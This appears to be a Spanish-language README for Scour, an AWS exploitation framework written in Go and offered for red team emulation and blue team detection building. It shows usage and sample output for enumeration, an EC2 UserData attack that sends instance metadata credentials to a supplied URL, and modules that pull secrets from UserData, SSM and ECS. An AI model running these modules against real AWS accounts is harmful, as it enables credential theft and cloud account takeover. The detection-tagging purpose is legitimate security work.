
Framework de explotación de AWS basado en módulos para pruebas de equipo rojo y análisis de equipo azul. Emula patrones de ataque en el plano de control de AWS con seguimiento único de UA para el desarrollo de detecciones.
Esta herramienta se utiliza para emular patrones de ataque dentro del plano de control de AWS. Cada ataque está etiquetado con un UA específico para que el equipo azul lo detecte.
Esto sigue siendo un trabajo en progreso. **Muchos errores
No listo para producción
Dónde reportar problemas: https://github.com/grines/scour/issues
Mantenido por: grines
Scour es un marco moderno de explotación de AWS basado en módulos escrito en Go, diseñado para pruebas de equipo rojo y análisis de equipo azul. Scour contiene técnicas modernas que se pueden usar para atacar entornos o construir detecciones para la defensa.
Scour está escrito en Go, por lo que es fácil de distribuir como binario.
##Obtener
go get github.com/grines/scour
##Compilar
go build main.go
Para obtener instrucciones de usuario más detalladas y fáciles de usar, consulte la guía de instalación de la Wiki. **próximamente
Scour usa una variedad de módulos:
La primera vez que se inicia Scour,
token profile <profile_name> <region> listará los perfiles de AWS disponibles almacenados en ~/aws/credentials.token AssumeRole <role_name> <region> asumirá un rol de la misma cuenta o de otra cuenta. ** requiere sesión activahelp module devolverá la información de ayuda aplicable para el módulo especificado. ** ayuda PENDIENTEattack evasion <tactic> ejecutará el módulo especificado con sus parámetros predeterminados.scour entrará en modo CLINot Connected <> token profile apiuser us-east-1 establece la sesión a usar para los comandos que la requieranConnected <apiuser/us-east-1> conectado activamente a un perfil de AWS desde (~,/aws/credentials) en (región)Connected <apiuser/us-east-1> attack enum <attack> autocompletado con lista de tácticas de enumeración disponiblesConnected <apiuser/us-east-1> attack privesc <attack> autocompletado con lista de tácticas de escalada de privilegios disponiblesConnected <apiuser/us-east-1> attack lateral <attack> autocompletado con lista de tácticas de movimiento lateral disponiblesConnected <apiuser/us-east-1> attack evasion <attack> autocompletado con lista de tácticas de evasión disponiblesConnected <apiuser/us-east-1> attack creds <attack> autocompletado con lista de tácticas de descubrimiento de credenciales disponiblesConnected <apiuser/us-east-1> attack execute <attack> autocompletado con lista de tácticas de ejecución disponibles
Connected <apiuser/us-east-1> attack enum IAM descubrimiento de IAM+-------------+---------------------+------------------+---------------+--------------+
| USER | MANAGED POLICIES | INLINE POLICIES | GROUPS | ISPRIVILEGED |
+-------------+---------------------+------------------+---------------+--------------+
| admin | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true |
| EC2 | AmazonEC2FullAccess | | | true |
+-------------+---------------------+------------------+---------------+--------------+
Connected <apiuser/us-east-1> attack enum Roles Descubrimiento de rolesUA Tracking: exec-env/EVSWAyidC4/o18HtFPe1P/role-enum
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| ROLE | PRINCIPAL TYPE | IDENTITY/SERVICE | ISPRIVILEGED |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| Amazon_CodeBuild_dW6zqYHT3m | AWS | [arn:aws:iam::861******:root | true |
| | | codebuild.amazonaws.com] | |
| Amazon_CodeBuild_f2DOFPjMHK | Service | [codebuild.amazonaws.com] | true |
| Amazon_CodeBuild_HS59ko7lxn | Service | [codebuild.amazonaws.com] | true |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
Connected <apiuser/us-east-1> attack enum EC2 Descubrimiento de EC2UA Tracking: exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| INSTANCEID | INSTANCE PROFILE | VPC | PUBLICIP | PRIVATEIP | SECURITY GROUPS | PORTS | STATE | ISPRIVILEGED | ISPUBLIC |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| i-0f5604708c0b51429 | None | vpc-7e830c1a | None | 172.31.53.199 | sg-09fcd28717cf4f512 | 80* | stopped | false | true |
| | | | | | | 22* | | | |
| | | | | | | 5000* | | | |
| i-03657fe3b9decdf51 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.45.96 | sg-61b1fd07 | All* | stopped | true | true |
| | | | | | | 8888* | | | |
| i-01b265a5fdc45df57 | None | vpc-7e830c1a | None | 172.31.38.118 | sg-0392f752f9b849d3f | 3389* | stopped | false | true |
| i-0867709d6c0be74d9 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.39.199 | sg-006543a34d2f70028 | 22* | stopped | true | true |
| i-0d95790b5e7ddff23 | None | vpc-7e830c1a | None | 172.31.12.57 | sg-e1a50dac | 33391* | stopped | false | true |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
Connected <apiuser/us-east-1> attack enum S3 Descubrimiento de S3UA Tracking: exec-env/EVSWAyidC4/GDGZaYQOuo/s3-enum
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| BUCKET | HASPOLICY | ISWEBSITE | ALLOW PUBLIC | PERMISSIONS | ALLOW AUTHENTICATED | PERMISSIONS | REPLICATION | REGION |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| amazon-conn********3d79b01a | false | false | false | | false | | false | us-west-2 |
| aws-cloudtrail-logs-**********98-cb39df0d | true | false | false | | false | | false | |
| bullsecu********* | true | true | false | | false | | false | |
| connect-6ec*****ad67 | false | false | false | | false | | false | |
| connect-******5337c3 | false | false | false | | false | | false | |
| ransom******** | true | false | false | | false | | false | |
| red******** | false | false | false | | false | | false | |
| rep-***** | false | false | false | | false | | false | us-west-2 |
| terraform******* | false | false | false | | false | | false | |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
Connected <apiuser/us-east-1> attack enum Groups Descubrimiento de gruposUA Tracking: exec-env/EVSWAyidC4/jAIKVdESpU/groups-enum
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| GROUP | POLICIES | ISPRIVILEGED | INLINE POLICIES | ISPRIVILEGED |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| EC2 | SecurityAudit | false | | false |
| OpsWorks-dac9e9ba-8b3d-4e04-9ad9-d988ca4c0731 | | false | | false |
| TestGroup | AmazonEC2FullAccess | true | | false |
| | SecurityAudit | | | |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
Connected <apiuser/us-east-1> attack enum Network Descubrimiento de redesTBD

Connected <apiuser/us-east-1> attack privesc UserData i-0f5604708c0b51429 http://url.to.capture.post.data roba credenciales de metadatos de EC2. Detener instancia / Actualizar userdata para enviar credenciales a la URL proporcionada / Iniciar instancia (envía token de EC2 a la URL).[Sun May 9 06:10:16 2021] INF Stopping Instance i-0f5604708c0b51429 - State: stopped
[Sun May 9 06:10:46 2021] INF Modifying Instance Attribute UserData on i-0f5604708c0b51429
[Sun May 9 06:10:47 2021] INF Starting Instance i-0f5604708c0b51429 - State: pending

Connected <apiuser/us-east-1> attack creds UserData saquea credenciales de userdata de EC2UA Tracking: exec-env/yzaqX9HFvP/oL1oho99ZP/userdata-creds
+---------------------+------------------+-------------------------------------------------------------------------------+
| INSTANCEID | RULE | FINDING |
+---------------------+------------------+-------------------------------------------------------------------------------+
| i-0f5604708c0b51429 | Slack Webhook | https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX |
| i-0f5604708c0b51429 | Generic Password | password=thisisapassword |
+---------------------+------------------+-------------------------------------------------------------------------------+
Connected <apiuser/us-east-1> attack creds SSM saquea credenciales de Systems ManagerUA Tracking: exec-env/yzaqX9HFvP/FASongUCcG/ssm-params-creds
+------------+----------+----------------------+
| PARAM NAME | DATATYPE | VALUE |
+------------+----------+----------------------+
| Test | text | thismightbeapassword |
+------------+----------+----------------------+
Connected <apiuser/us-east-1> attack creds ECS saquea credenciales de ECSUA Tracking: exec-env/9tsJFrIPmw/rEGaMfF5AI/ecs-creds
+-------------+-------+------------+
| ENVARS NAME | VALUE | DEFINITION |
+-------------+-------+------------+
| Secret | heere | sample-app |
+-------------+-------+------------+
Connected <apiuser/us-east-1> attack persist <attack> autocompletado con lista de tácticas de persistencia disponiblesConnected <apiuser/us-east-1> attack exfil <attack> autocompletado con lista de tácticas de exfiltración disponibles